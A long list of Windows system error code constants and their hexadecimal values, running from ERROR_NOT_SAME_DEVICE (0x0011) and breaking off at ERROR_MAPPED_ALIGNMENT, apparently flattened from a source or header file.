ERROR_NOT_SAME_DEVICE = 0x0011 + ERROR_NO_MORE_FILES = 0x0012 + ERROR_WRITE_PROTECT = 0x0013 + ERROR_BAD_UNIT = 0x0014 + ERROR_NOT_READY = 0x0015 + ERROR_BAD_COMMAND = 0x0016 + ERROR_CRC = 0x0017 + ERROR_BAD_LENGTH = 0x0018 + ERROR_SEEK = 0x0019 + ERROR_NOT_DOS_DISK = 0x001A + ERROR_SECTOR_NOT_FOUND = 0x001B + ERROR_OUT_OF_PAPER = 0x001C + ERROR_WRITE_FAULT = 0x001D + ERROR_READ_FAULT = 0x001E + ERROR_GEN_FAILURE = 0x001F + ERROR_SHARING_VIOLATION = 0x0020 + ERROR_LOCK_VIOLATION = 0x0021 + ERROR_WRONG_DISK = 0x0022 + ERROR_SHARING_BUFFER_EXCEEDED = 0x0024 + ERROR_HANDLE_EOF = 0x0026 + ERROR_HANDLE_DISK_FULL = 0x0027 + ERROR_NOT_SUPPORTED = 0x0032 + ERROR_REM_NOT_LIST = 0x0033 + ERROR_DUP_NAME = 0x0034 + ERROR_BAD_NETPATH = 0x0035 + ERROR_NETWORK_BUSY = 0x0036 + ERROR_DEV_NOT_EXIST = 0x0037 + ERROR_TOO_MANY_CMDS = 0x0038 + ERROR_ADAP_HDW_ERR = 0x0039 + ERROR_BAD_NET_RESP = 0x003A + ERROR_UNEXP_NET_ERR = 0x003B + ERROR_BAD_REM_ADAP = 0x003C + ERROR_PRINTQ_FULL = 0x003D + ERROR_NO_SPOOL_SPACE = 0x003E + ERROR_PRINT_CANCELLED = 0x003F + ERROR_NETNAME_DELETED = 0x0040 + ERROR_NETWORK_ACCESS_DENIED = 0x0041 + ERROR_BAD_DEV_TYPE = 0x0042 + ERROR_BAD_NET_NAME = 0x0043 + ERROR_TOO_MANY_NAMES = 0x0044 + ERROR_TOO_MANY_SESS = 0x0045 + ERROR_SHARING_PAUSED = 0x0046 + ERROR_REQ_NOT_ACCEP = 0x0047 + ERROR_REDIR_PAUSED = 0x0048 + ERROR_FILE_EXISTS = 0x0050 + ERROR_CANNOT_MAKE = 0x0052 + ERROR_FAIL_I24 = 0x0053 + ERROR_OUT_OF_STRUCTURES = 0x0054 + ERROR_ALREADY_ASSIGNED = 0x0055 + ERROR_INVALID_PASSWORD = 0x0056 + ERROR_INVALID_PARAMETER = 0x0057 + ERROR_NET_WRITE_FAULT = 0x0058 + ERROR_NO_PROC_SLOTS = 0x0059 + ERROR_TOO_MANY_SEMAPHORES = 0x0064 + ERROR_EXCL_SEM_ALREADY_OWNED = 0x0065 + ERROR_SEM_IS_SET = 0x0066 + ERROR_TOO_MANY_SEM_REQUESTS = 0x0067 + ERROR_INVALID_AT_INTERRUPT_TIME = 0x0068 + ERROR_SEM_OWNER_DIED = 0x0069 + ERROR_SEM_USER_LIMIT = 0x006A + ERROR_DISK_CHANGE = 0x006B + ERROR_DRIVE_LOCKED = 0x006C + ERROR_BROKEN_PIPE = 0x006D + ERROR_OPEN_FAILED = 0x006E + ERROR_BUFFER_OVERFLOW = 0x006F + ERROR_DISK_FULL = 0x0070 + ERROR_NO_MORE_SEARCH_HANDLES = 0x0071 + ERROR_INVALID_TARGET_HANDLE = 0x0072 + ERROR_INVALID_CATEGORY = 0x0075 + ERROR_INVALID_VERIFY_SWITCH = 0x0076 + ERROR_BAD_DRIVER_LEVEL = 0x0077 + ERROR_CALL_NOT_IMPLEMENTED = 0x0078 + ERROR_SEM_TIMEOUT = 0x0079 + ERROR_INSUFFICIENT_BUFFER = 0x007A + ERROR_INVALID_NAME = 0x007B + ERROR_INVALID_LEVEL = 0x007C + ERROR_NO_VOLUME_LABEL = 0x007D + ERROR_MOD_NOT_FOUND = 0x007E + ERROR_PROC_NOT_FOUND = 0x007F + ERROR_WAIT_NO_CHILDREN = 0x0080 + ERROR_CHILD_NOT_COMPLETE = 0x0081 + ERROR_DIRECT_ACCESS_HANDLE = 0x0082 + ERROR_NEGATIVE_SEEK = 0x0083 + ERROR_SEEK_ON_DEVICE = 0x0084 + ERROR_IS_JOIN_TARGET = 0x0085 + ERROR_IS_JOINED = 0x0086 + ERROR_IS_SUBSTED = 0x0087 + ERROR_NOT_JOINED = 0x0088 + ERROR_NOT_SUBSTED = 0x0089 + ERROR_JOIN_TO_JOIN = 0x008A + ERROR_SUBST_TO_SUBST = 0x008B + ERROR_JOIN_TO_SUBST = 0x008C + ERROR_SUBST_TO_JOIN = 0x008D + ERROR_BUSY_DRIVE = 0x008E + ERROR_SAME_DRIVE = 0x008F + ERROR_DIR_NOT_ROOT = 0x0090 + ERROR_DIR_NOT_EMPTY = 0x0091 + ERROR_IS_SUBST_PATH = 0x0092 + ERROR_IS_JOIN_PATH = 0x0093 + ERROR_PATH_BUSY = 0x0094 + ERROR_IS_SUBST_TARGET = 0x0095 + ERROR_SYSTEM_TRACE = 0x0096 + ERROR_INVALID_EVENT_COUNT = 0x0097 + ERROR_TOO_MANY_MUXWAITERS = 0x0098 + ERROR_INVALID_LIST_FORMAT = 0x0099 + ERROR_LABEL_TOO_LONG = 0x009A + ERROR_TOO_MANY_TCBS = 0x009B + ERROR_SIGNAL_REFUSED = 0x009C + ERROR_DISCARDED = 0x009D + ERROR_NOT_LOCKED = 0x009E + ERROR_BAD_THREADID_ADDR = 0x009F + ERROR_BAD_ARGUMENTS = 0x00A0 + ERROR_BAD_PATHNAME = 0x00A1 + ERROR_SIGNAL_PENDING = 0x00A2 + ERROR_MAX_THRDS_REACHED = 0x00A4 + ERROR_LOCK_FAILED = 0x00A7 + ERROR_BUSY = 0x00AA + ERROR_CANCEL_VIOLATION = 0x00AD + ERROR_ATOMIC_LOCKS_NOT_SUPPORTED = 0x00AE + ERROR_INVALID_SEGMENT_NUMBER = 0x00B4 + ERROR_INVALID_ORDINAL = 0x00B6 + ERROR_ALREADY_EXISTS = 0x00B7 + ERROR_INVALID_FLAG_NUMBER = 0x00BA + ERROR_SEM_NOT_FOUND = 0x00BB + ERROR_INVALID_STARTING_CODESEG = 0x00BC + ERROR_INVALID_STACKSEG = 0x00BD + ERROR_INVALID_MODULETYPE = 0x00BE + ERROR_INVALID_EXE_SIGNATURE = 0x00BF + ERROR_EXE_MARKED_INVALID = 0x00C0 + ERROR_BAD_EXE_FORMAT = 0x00C1 + ERROR_ITERATED_DATA_EXCEEDS_64k = 0x00C2 + ERROR_INVALID_MINALLOCSIZE = 0x00C3 + ERROR_DYNLINK_FROM_INVALID_RING = 0x00C4 + ERROR_IOPL_NOT_ENABLED = 0x00C5 + ERROR_INVALID_SEGDPL = 0x00C6 + ERROR_AUTODATASEG_EXCEEDS_64k = 0x00C7 + ERROR_RING2SEG_MUST_BE_MOVABLE = 0x00C8 + ERROR_RELOC_CHAIN_XEEDS_SEGLIM = 0x00C9 + ERROR_INFLOOP_IN_RELOC_CHAIN = 0x00CA + ERROR_ENVVAR_NOT_FOUND = 0x00CB + ERROR_NO_SIGNAL_SENT = 0x00CD + ERROR_FILENAME_EXCED_RANGE = 0x00CE + ERROR_RING2_STACK_IN_USE = 0x00CF + ERROR_META_EXPANSION_TOO_LONG = 0x00D0 + ERROR_INVALID_SIGNAL_NUMBER = 0x00D1 + ERROR_THREAD_1_INACTIVE = 0x00D2 + ERROR_LOCKED = 0x00D4 + ERROR_TOO_MANY_MODULES = 0x00D6 + ERROR_NESTING_NOT_ALLOWED = 0x00D7 + ERROR_EXE_MACHINE_TYPE_MISMATCH = 0x00D8 + ERROR_EXE_CANNOT_MODIFY_SIGNED_BINARY = 0x00D9 + ERROR_EXE_CANNOT_MODIFY_STRONG_SIGNED_BINARY = 0x00DA + ERROR_FILE_CHECKED_OUT = 0x00DC + ERROR_CHECKOUT_REQUIRED = 0x00DD + ERROR_BAD_FILE_TYPE = 0x00DE + ERROR_FILE_TOO_LARGE = 0x00DF + ERROR_FORMS_AUTH_REQUIRED = 0x00E0 + ERROR_VIRUS_INFECTED = 0x00E1 + ERROR_VIRUS_DELETED = 0x00E2 + ERROR_PIPE_LOCAL = 0x00E5 + ERROR_BAD_PIPE = 0x00E6 + ERROR_PIPE_BUSY = 0x00E7 + ERROR_NO_DATA = 0x00E8 + ERROR_PIPE_NOT_CONNECTED = 0x00E9 + ERROR_MORE_DATA = 0x00EA + ERROR_VC_DISCONNECTED = 0x00F0 + ERROR_INVALID_EA_NAME = 0x00FE + ERROR_EA_LIST_INCONSISTENT = 0x00FF + ERROR_WAIT_TIMEOUT = 0x0102 + ERROR_NO_MORE_ITEMS = 0x0103 + ERROR_CANNOT_COPY = 0x010A + ERROR_DIRECTORY = 0x010B + ERROR_EAS_DIDNT_FIT = 0x0113 + ERROR_EA_FILE_CORRUPT = 0x0114 + ERROR_EA_TABLE_FULL = 0x0115 + ERROR_INVALID_EA_HANDLE = 0x0116 + ERROR_EAS_NOT_SUPPORTED = 0x011A + ERROR_NOT_OWNER = 0x0120 + ERROR_TOO_MANY_POSTS = 0x012A + ERROR_PARTIAL_COPY = 0x012B + ERROR_OPLOCK_NOT_GRANTED = 0x012C + ERROR_INVALID_OPLOCK_PROTOCOL = 0x012D + ERROR_DISK_TOO_FRAGMENTED = 0x012E + ERROR_DELETE_PENDING = 0x012F + ERROR_INCOMPATIBLE_WITH_GLOBAL_SHORT_NAME_REGISTRY_SETTING = 0x0130 + ERROR_SHORT_NAMES_NOT_ENABLED_ON_VOLUME = 0x0131 + ERROR_SECURITY_STREAM_IS_INCONSISTENT = 0x0132 + ERROR_INVALID_LOCK_RANGE = 0x0133 + ERROR_IMAGE_SUBSYSTEM_NOT_PRESENT = 0x0134 + ERROR_NOTIFICATION_GUID_ALREADY_DEFINED = 0x0135 + ERROR_MR_MID_NOT_FOUND = 0x013D + ERROR_SCOPE_NOT_FOUND = 0x013E + ERROR_FAIL_NOACTION_REBOOT = 0x015E + ERROR_FAIL_SHUTDOWN = 0x015F + ERROR_FAIL_RESTART = 0x0160 + ERROR_MAX_SESSIONS_REACHED = 0x0161 + ERROR_THREAD_MODE_ALREADY_BACKGROUND = 0x0190 + ERROR_THREAD_MODE_NOT_BACKGROUND = 0x0191 + ERROR_PROCESS_MODE_ALREADY_BACKGROUND = 0x0192 + ERROR_PROCESS_MODE_NOT_BACKGROUND = 0x0193 + ERROR_INVALID_ADDRESS = 0x01E7 + ERROR_USER_PROFILE_LOAD = 0x01F4 + ERROR_ARITHMETIC_OVERFLOW = 0x0216 + ERROR_PIPE_CONNECTED = 0x0217 + ERROR_PIPE_LISTENING = 0x0218 + ERROR_VERIFIER_STOP = 0x0219 + ERROR_ABIOS_ERROR = 0x021A + ERROR_WX86_WARNING = 0x021B + ERROR_WX86_ERROR = 0x021C + ERROR_TIMER_NOT_CANCELED = 0x021D + ERROR_UNWIND = 0x021E + ERROR_BAD_STACK = 0x021F + ERROR_INVALID_UNWIND_TARGET = 0x0220 + ERROR_INVALID_PORT_ATTRIBUTES = 0x0221 + ERROR_PORT_MESSAGE_TOO_LONG = 0x0222 + ERROR_INVALID_QUOTA_LOWER = 0x0223 + ERROR_DEVICE_ALREADY_ATTACHED = 0x0224 + ERROR_INSTRUCTION_MISALIGNMENT = 0x0225 + ERROR_PROFILING_NOT_STARTED = 0x0226 + ERROR_PROFILING_NOT_STOPPED = 0x0227 + ERROR_COULD_NOT_INTERPRET = 0x0228 + ERROR_PROFILING_AT_LIMIT = 0x0229 + ERROR_CANT_WAIT = 0x022A + ERROR_CANT_TERMINATE_SELF = 0x022B + ERROR_UNEXPECTED_MM_CREATE_ERR = 0x022C + ERROR_UNEXPECTED_MM_MAP_ERROR = 0x022D + ERROR_UNEXPECTED_MM_EXTEND_ERR = 0x022E + ERROR_BAD_FUNCTION_TABLE = 0x022F + ERROR_NO_GUID_TRANSLATION = 0x0230 + ERROR_INVALID_LDT_SIZE = 0x0231 + ERROR_INVALID_LDT_OFFSET = 0x0233 + ERROR_INVALID_LDT_DESCRIPTOR = 0x0234 + ERROR_TOO_MANY_THREADS = 0x0235 + ERROR_THREAD_NOT_IN_PROCESS = 0x0236 + ERROR_PAGEFILE_QUOTA_EXCEEDED = 0x0237 + ERROR_LOGON_SERVER_CONFLICT = 0x0238 + ERROR_SYNCHRONIZATION_REQUIRED = 0x0239 + ERROR_NET_OPEN_FAILED = 0x023A + ERROR_IO_PRIVILEGE_FAILED = 0x023B + ERROR_CONTROL_C_EXIT = 0x023C + ERROR_MISSING_SYSTEMFILE = 0x023D + ERROR_UNHANDLED_EXCEPTION = 0x023E + ERROR_APP_INIT_FAILURE = 0x023F + ERROR_PAGEFILE_CREATE_FAILED = 0x0240 + ERROR_INVALID_IMAGE_HASH = 0x0241 + ERROR_NO_PAGEFILE = 0x0242 + ERROR_ILLEGAL_FLOAT_CONTEXT = 0x0243 + ERROR_NO_EVENT_PAIR = 0x0244 + ERROR_DOMAIN_CTRLR_CONFIG_ERROR = 0x0245 + ERROR_ILLEGAL_CHARACTER = 0x0246 + ERROR_UNDEFINED_CHARACTER = 0x0247 + ERROR_FLOPPY_VOLUME = 0x0248 + ERROR_BIOS_FAILED_TO_CONNECT_INTERRUPT = 0x0249 + ERROR_BACKUP_CONTROLLER = 0x024A + ERROR_MUTANT_LIMIT_EXCEEDED = 0x024B + ERROR_FS_DRIVER_REQUIRED = 0x024C + ERROR_CANNOT_LOAD_REGISTRY_FILE = 0x024D + ERROR_DEBUG_ATTACH_FAILED = 0x024E + ERROR_SYSTEM_PROCESS_TERMINATED = 0x024F + ERROR_DATA_NOT_ACCEPTED = 0x0250 + ERROR_VDM_HARD_ERROR = 0x0251 + ERROR_DRIVER_CANCEL_TIMEOUT = 0x0252 + ERROR_REPLY_MESSAGE_MISMATCH = 0x0253 + ERROR_LOST_WRITEBEHIND_DATA = 0x0254 + ERROR_CLIENT_SERVER_PARAMETERS_INVALID = 0x0255 + ERROR_NOT_TINY_STREAM = 0x0256 + ERROR_STACK_OVERFLOW_READ = 0x0257 + ERROR_CONVERT_TO_LARGE = 0x0258 + ERROR_FOUND_OUT_OF_SCOPE = 0x0259 + ERROR_ALLOCATE_BUCKET = 0x025A + ERROR_MARSHALL_OVERFLOW = 0x025B + ERROR_INVALID_VARIANT = 0x025C + ERROR_BAD_COMPRESSION_BUFFER = 0x025D + ERROR_AUDIT_FAILED = 0x025E + ERROR_TIMER_RESOLUTION_NOT_SET = 0x025F + ERROR_INSUFFICIENT_LOGON_INFO = 0x0260 + ERROR_BAD_DLL_ENTRYPOINT = 0x0261 + ERROR_BAD_SERVICE_ENTRYPOINT = 0x0262 + ERROR_IP_ADDRESS_CONFLICT1 = 0x0263 + ERROR_IP_ADDRESS_CONFLICT2 = 0x0264 + ERROR_REGISTRY_QUOTA_LIMIT = 0x0265 + ERROR_NO_CALLBACK_ACTIVE = 0x0266 + ERROR_PWD_TOO_SHORT = 0x0267 + ERROR_PWD_TOO_RECENT = 0x0268 + ERROR_PWD_HISTORY_CONFLICT = 0x0269 + ERROR_UNSUPPORTED_COMPRESSION = 0x026A + ERROR_INVALID_HW_PROFILE = 0x026B + ERROR_INVALID_PLUGPLAY_DEVICE_PATH = 0x026C + ERROR_QUOTA_LIST_INCONSISTENT = 0x026D + ERROR_EVALUATION_EXPIRATION = 0x026E + ERROR_ILLEGAL_DLL_RELOCATION = 0x026F + ERROR_DLL_INIT_FAILED_LOGOFF = 0x0270 + ERROR_VALIDATE_CONTINUE = 0x0271 + ERROR_NO_MORE_MATCHES = 0x0272 + ERROR_RANGE_LIST_CONFLICT = 0x0273 + ERROR_SERVER_SID_MISMATCH = 0x0274 + ERROR_CANT_ENABLE_DENY_ONLY = 0x0275 + ERROR_FLOAT_MULTIPLE_FAULTS = 0x0276 + ERROR_FLOAT_MULTIPLE_TRAPS = 0x0277 + ERROR_NOINTERFACE = 0x0278 + ERROR_DRIVER_FAILED_SLEEP = 0x0279 + ERROR_CORRUPT_SYSTEM_FILE = 0x027A + ERROR_COMMITMENT_MINIMUM = 0x027B + ERROR_PNP_RESTART_ENUMERATION = 0x027C + ERROR_SYSTEM_IMAGE_BAD_SIGNATURE = 0x027D + ERROR_PNP_REBOOT_REQUIRED = 0x027E + ERROR_INSUFFICIENT_POWER = 0x027F + ERROR_MULTIPLE_FAULT_VIOLATION = 0x0280 + ERROR_SYSTEM_SHUTDOWN = 0x0281 + ERROR_PORT_NOT_SET = 0x0282 + ERROR_DS_VERSION_CHECK_FAILURE = 0x0283 + ERROR_RANGE_NOT_FOUND = 0x0284 + ERROR_NOT_SAFE_MODE_DRIVER = 0x0286 + ERROR_FAILED_DRIVER_ENTRY = 0x0287 + ERROR_DEVICE_ENUMERATION_ERROR = 0x0288 + ERROR_MOUNT_POINT_NOT_RESOLVED = 0x0289 + ERROR_INVALID_DEVICE_OBJECT_PARAMETER = 0x028A + ERROR_MCA_OCCURED = 0x028B + ERROR_DRIVER_DATABASE_ERROR = 0x028C + ERROR_SYSTEM_HIVE_TOO_LARGE = 0x028D + ERROR_DRIVER_FAILED_PRIOR_UNLOAD = 0x028E + ERROR_VOLSNAP_PREPARE_HIBERNATE = 0x028F + ERROR_HIBERNATION_FAILURE = 0x0290 + ERROR_FILE_SYSTEM_LIMITATION = 0x0299 + ERROR_ASSERTION_FAILURE = 0x029C + ERROR_ACPI_ERROR = 0x029D + ERROR_WOW_ASSERTION = 0x029E + ERROR_PNP_BAD_MPS_TABLE = 0x029F + ERROR_PNP_TRANSLATION_FAILED = 0x02A0 + ERROR_PNP_IRQ_TRANSLATION_FAILED = 0x02A1 + ERROR_PNP_INVALID_ID = 0x02A2 + ERROR_WAKE_SYSTEM_DEBUGGER = 0x02A3 + ERROR_HANDLES_CLOSED = 0x02A4 + ERROR_EXTRANEOUS_INFORMATION = 0x02A5 + ERROR_RXACT_COMMIT_NECESSARY = 0x02A6 + ERROR_MEDIA_CHECK = 0x02A7 + ERROR_GUID_SUBSTITUTION_MADE = 0x02A8 + ERROR_STOPPED_ON_SYMLINK = 0x02A9 + ERROR_LONGJUMP = 0x02AA + ERROR_PLUGPLAY_QUERY_VETOED = 0x02AB + ERROR_UNWIND_CONSOLIDATE = 0x02AC + ERROR_REGISTRY_HIVE_RECOVERED = 0x02AD + ERROR_DLL_MIGHT_BE_INSECURE = 0x02AE + ERROR_DLL_MIGHT_BE_INCOMPATIBLE = 0x02AF + ERROR_DBG_EXCEPTION_NOT_HANDLED = 0x02B0 + ERROR_DBG_REPLY_LATER = 0x02B1 + ERROR_DBG_UNABLE_TO_PROVIDE_HANDLE = 0x02B2 + ERROR_DBG_TERMINATE_THREAD = 0x02B3 + ERROR_DBG_TERMINATE_PROCESS = 0x02B4 + ERROR_DBG_CONTROL_C = 0x02B5 + ERROR_DBG_PRINTEXCEPTION_C = 0x02B6 + ERROR_DBG_RIPEXCEPTION = 0x02B7 + ERROR_DBG_CONTROL_BREAK = 0x02B8 + ERROR_DBG_COMMAND_EXCEPTION = 0x02B9 + ERROR_OBJECT_NAME_EXISTS = 0x02BA + ERROR_THREAD_WAS_SUSPENDED = 0x02BB + ERROR_IMAGE_NOT_AT_BASE = 0x02BC + ERROR_RXACT_STATE_CREATED = 0x02BD + ERROR_SEGMENT_NOTIFICATION = 0x02BE + ERROR_BAD_CURRENT_DIRECTORY = 0x02BF + ERROR_FT_READ_RECOVERY_FROM_BACKUP = 0x02C0 + ERROR_FT_WRITE_RECOVERY = 0x02C1 + ERROR_IMAGE_MACHINE_TYPE_MISMATCH = 0x02C2 + ERROR_RECEIVE_PARTIAL = 0x02C3 + ERROR_RECEIVE_EXPEDITED = 0x02C4 + ERROR_RECEIVE_PARTIAL_EXPEDITED = 0x02C5 + ERROR_EVENT_DONE = 0x02C6 + ERROR_EVENT_PENDING = 0x02C7 + ERROR_CHECKING_FILE_SYSTEM = 0x02C8 + ERROR_FATAL_APP_EXIT = 0x02C9 + ERROR_PREDEFINED_HANDLE = 0x02CA + ERROR_WAS_UNLOCKED = 0x02CB + ERROR_SERVICE_NOTIFICATION = 0x02CC + ERROR_WAS_LOCKED = 0x02CD + ERROR_LOG_HARD_ERROR = 0x02CE + ERROR_ALREADY_WIN32 = 0x02CF + ERROR_IMAGE_MACHINE_TYPE_MISMATCH_EXE = 0x02D0 + ERROR_NO_YIELD_PERFORMED = 0x02D1 + ERROR_TIMER_RESUME_IGNORED = 0x02D2 + ERROR_ARBITRATION_UNHANDLED = 0x02D3 + ERROR_CARDBUS_NOT_SUPPORTED = 0x02D4 + ERROR_MP_PROCESSOR_MISMATCH = 0x02D5 + ERROR_HIBERNATED = 0x02D6 + ERROR_RESUME_HIBERNATION = 0x02D7 + ERROR_FIRMWARE_UPDATED = 0x02D8 + ERROR_DRIVERS_LEAKING_LOCKED_PAGES = 0x02D9 + ERROR_WAKE_SYSTEM = 0x02DA + ERROR_WAIT_1 = 0x02DB + ERROR_WAIT_2 = 0x02DC + ERROR_WAIT_3 = 0x02DD + ERROR_WAIT_63 = 0x02DE + ERROR_ABANDONED_WAIT_0 = 0x02DF + ERROR_ABANDONED_WAIT_63 = 0x02E0 + ERROR_USER_APC = 0x02E1 + ERROR_KERNEL_APC = 0x02E2 + ERROR_ALERTED = 0x02E3 + ERROR_ELEVATION_REQUIRED = 0x02E4 + ERROR_REPARSE = 0x02E5 + ERROR_OPLOCK_BREAK_IN_PROGRESS = 0x02E6 + ERROR_VOLUME_MOUNTED = 0x02E7 + ERROR_RXACT_COMMITTED = 0x02E8 + ERROR_NOTIFY_CLEANUP = 0x02E9 + ERROR_PRIMARY_TRANSPORT_CONNECT_FAILED = 0x02EA + ERROR_PAGE_FAULT_TRANSITION = 0x02EB + ERROR_PAGE_FAULT_DEMAND_ZERO = 0x02EC + ERROR_PAGE_FAULT_COPY_ON_WRITE = 0x02ED + ERROR_PAGE_FAULT_GUARD_PAGE = 0x02EE + ERROR_PAGE_FAULT_PAGING_FILE = 0x02EF + ERROR_CACHE_PAGE_LOCKED = 0x02F0 + ERROR_CRASH_DUMP = 0x02F1 + ERROR_BUFFER_ALL_ZEROS = 0x02F2 + ERROR_REPARSE_OBJECT = 0x02F3 + ERROR_RESOURCE_REQUIREMENTS_CHANGED = 0x02F4 + ERROR_TRANSLATION_COMPLETE = 0x02F5 + ERROR_NOTHING_TO_TERMINATE = 0x02F6 + ERROR_PROCESS_NOT_IN_JOB = 0x02F7 + ERROR_PROCESS_IN_JOB = 0x02F8 + ERROR_VOLSNAP_HIBERNATE_READY = 0x02F9 + ERROR_FSFILTER_OP_COMPLETED_SUCCESSFULLY = 0x02FA + ERROR_INTERRUPT_VECTOR_ALREADY_CONNECTED = 0x02FB + ERROR_INTERRUPT_STILL_CONNECTED = 0x02FC + ERROR_WAIT_FOR_OPLOCK = 0x02FD + ERROR_DBG_EXCEPTION_HANDLED = 0x02FE + ERROR_DBG_CONTINUE = 0x02FF + ERROR_CALLBACK_POP_STACK = 0x0300 + ERROR_COMPRESSION_DISABLED = 0x0301 + ERROR_CANTFETCHBACKWARDS = 0x0302 + ERROR_CANTSCROLLBACKWARDS = 0x0303 + ERROR_ROWSNOTRELEASED = 0x0304 + ERROR_BAD_ACCESSOR_FLAGS = 0x0305 + ERROR_ERRORS_ENCOUNTERED = 0x0306 + ERROR_NOT_CAPABLE = 0x0307 + ERROR_REQUEST_OUT_OF_SEQUENCE = 0x0308 + ERROR_VERSION_PARSE_ERROR = 0x0309 + ERROR_BADSTARTPOSITION = 0x030A + ERROR_MEMORY_HARDWARE = 0x030B + ERROR_DISK_REPAIR_DISABLED = 0x030C + ERROR_INSUFFICIENT_RESOURCE_FOR_SPECIFIED_SHARED_SECTION_SIZE = 0x030D + ERROR_SYSTEM_POWERSTATE_TRANSITION = 0x030E + ERROR_SYSTEM_POWERSTATE_COMPLEX_TRANSITION = 0x030F + ERROR_MCA_EXCEPTION = 0x0310 + ERROR_ACCESS_AUDIT_BY_POLICY = 0x0311 + ERROR_ACCESS_DISABLED_NO_SAFER_UI_BY_POLICY = 0x0312 + ERROR_ABANDON_HIBERFILE = 0x0313 + ERROR_LOST_WRITEBEHIND_DATA_NETWORK_DISCONNECTED = 0x0314 + ERROR_LOST_WRITEBEHIND_DATA_NETWORK_SERVER_ERROR = 0x0315 + ERROR_LOST_WRITEBEHIND_DATA_LOCAL_DISK_ERROR = 0x0316 + ERROR_BAD_MCFG_TABLE = 0x0317 + ERROR_OPLOCK_SWITCHED_TO_NEW_HANDLE = 0x0320 + ERROR_CANNOT_GRANT_REQUESTED_OPLOCK = 0x0321 + ERROR_CANNOT_BREAK_OPLOCK = 0x0322 + ERROR_OPLOCK_HANDLE_CLOSED = 0x0323 + ERROR_NO_ACE_CONDITION = 0x0324 + ERROR_INVALID_ACE_CONDITION = 0x0325 + ERROR_EA_ACCESS_DENIED = 0x03E2 + ERROR_OPERATION_ABORTED = 0x03E3 + ERROR_IO_INCOMPLETE = 0x03E4 + ERROR_IO_PENDING = 0x03E5 + ERROR_NOACCESS = 0x03E6 + ERROR_SWAPERROR = 0x03E7 + ERROR_STACK_OVERFLOW = 0x03E9 + ERROR_INVALID_MESSAGE = 0x03EA + ERROR_CAN_NOT_COMPLETE = 0x03EB + ERROR_INVALID_FLAGS = 0x03EC + ERROR_UNRECOGNIZED_VOLUME = 0x03ED + ERROR_FILE_INVALID = 0x03EE + ERROR_FULLSCREEN_MODE = 0x03EF + ERROR_NO_TOKEN = 0x03F0 + ERROR_BADDB = 0x03F1 + ERROR_BADKEY = 0x03F2 + ERROR_CANTOPEN = 0x03F3 + ERROR_CANTREAD = 0x03F4 + ERROR_CANTWRITE = 0x03F5 + ERROR_REGISTRY_RECOVERED = 0x03F6 + ERROR_REGISTRY_CORRUPT = 0x03F7 + ERROR_REGISTRY_IO_FAILED = 0x03F8 + ERROR_NOT_REGISTRY_FILE = 0x03F9 + ERROR_KEY_DELETED = 0x03FA + ERROR_NO_LOG_SPACE = 0x03FB + ERROR_KEY_HAS_CHILDREN = 0x03FC + ERROR_CHILD_MUST_BE_VOLATILE = 0x03FD + ERROR_NOTIFY_ENUM_DIR = 0x03FE + ERROR_DEPENDENT_SERVICES_RUNNING = 0x041B + ERROR_INVALID_SERVICE_CONTROL = 0x041C + ERROR_SERVICE_REQUEST_TIMEOUT = 0x041D + ERROR_SERVICE_NO_THREAD = 0x041E + ERROR_SERVICE_DATABASE_LOCKED = 0x041F + ERROR_SERVICE_ALREADY_RUNNING = 0x0420 + ERROR_INVALID_SERVICE_ACCOUNT = 0x0421 + ERROR_SERVICE_DISABLED = 0x0422 + ERROR_CIRCULAR_DEPENDENCY = 0x0423 + ERROR_SERVICE_DOES_NOT_EXIST = 0x0424 + ERROR_SERVICE_CANNOT_ACCEPT_CTRL = 0x0425 + ERROR_SERVICE_NOT_ACTIVE = 0x0426 + ERROR_FAILED_SERVICE_CONTROLLER_CONNECT = 0x0427 + ERROR_EXCEPTION_IN_SERVICE = 0x0428 + ERROR_DATABASE_DOES_NOT_EXIST = 0x0429 + ERROR_SERVICE_SPECIFIC_ERROR = 0x042A + ERROR_PROCESS_ABORTED = 0x042B + ERROR_SERVICE_DEPENDENCY_FAIL = 0x042C + ERROR_SERVICE_LOGON_FAILED = 0x042D + ERROR_SERVICE_START_HANG = 0x042E + ERROR_INVALID_SERVICE_LOCK = 0x042F + ERROR_SERVICE_MARKED_FOR_DELETE = 0x0430 + ERROR_SERVICE_EXISTS = 0x0431 + ERROR_ALREADY_RUNNING_LKG = 0x0432 + ERROR_SERVICE_DEPENDENCY_DELETED = 0x0433 + ERROR_BOOT_ALREADY_ACCEPTED = 0x0434 + ERROR_SERVICE_NEVER_STARTED = 0x0435 + ERROR_DUPLICATE_SERVICE_NAME = 0x0436 + ERROR_DIFFERENT_SERVICE_ACCOUNT = 0x0437 + ERROR_CANNOT_DETECT_DRIVER_FAILURE = 0x0438 + ERROR_CANNOT_DETECT_PROCESS_ABORT = 0x0439 + ERROR_NO_RECOVERY_PROGRAM = 0x043A + ERROR_SERVICE_NOT_IN_EXE = 0x043B + ERROR_NOT_SAFEBOOT_SERVICE = 0x043C + ERROR_END_OF_MEDIA = 0x044C + ERROR_FILEMARK_DETECTED = 0x044D + ERROR_BEGINNING_OF_MEDIA = 0x044E + ERROR_SETMARK_DETECTED = 0x044F + ERROR_NO_DATA_DETECTED = 0x0450 + ERROR_PARTITION_FAILURE = 0x0451 + ERROR_INVALID_BLOCK_LENGTH = 0x0452 + ERROR_DEVICE_NOT_PARTITIONED = 0x0453 + ERROR_UNABLE_TO_LOCK_MEDIA = 0x0454 + ERROR_UNABLE_TO_UNLOAD_MEDIA = 0x0455 + ERROR_MEDIA_CHANGED = 0x0456 + ERROR_BUS_RESET = 0x0457 + ERROR_NO_MEDIA_IN_DRIVE = 0x0458 + ERROR_NO_UNICODE_TRANSLATION = 0x0459 + ERROR_DLL_INIT_FAILED = 0x045A + ERROR_SHUTDOWN_IN_PROGRESS = 0x045B + ERROR_NO_SHUTDOWN_IN_PROGRESS = 0x045C + ERROR_IO_DEVICE = 0x045D + ERROR_SERIAL_NO_DEVICE = 0x045E + ERROR_IRQ_BUSY = 0x045F + ERROR_MORE_WRITES = 0x0460 + ERROR_COUNTER_TIMEOUT = 0x0461 + ERROR_FLOPPY_ID_MARK_NOT_FOUND = 0x0462 + ERROR_FLOPPY_WRONG_CYLINDER = 0x0463 + ERROR_FLOPPY_UNKNOWN_ERROR = 0x0464 + ERROR_FLOPPY_BAD_REGISTERS = 0x0465 + ERROR_DISK_RECALIBRATE_FAILED = 0x0466 + ERROR_DISK_OPERATION_FAILED = 0x0467 + ERROR_DISK_RESET_FAILED = 0x0468 + ERROR_EOM_OVERFLOW = 0x0469 + ERROR_NOT_ENOUGH_SERVER_MEMORY = 0x046A + ERROR_POSSIBLE_DEADLOCK = 0x046B + ERROR_MAPPED_ALIGNMENT = 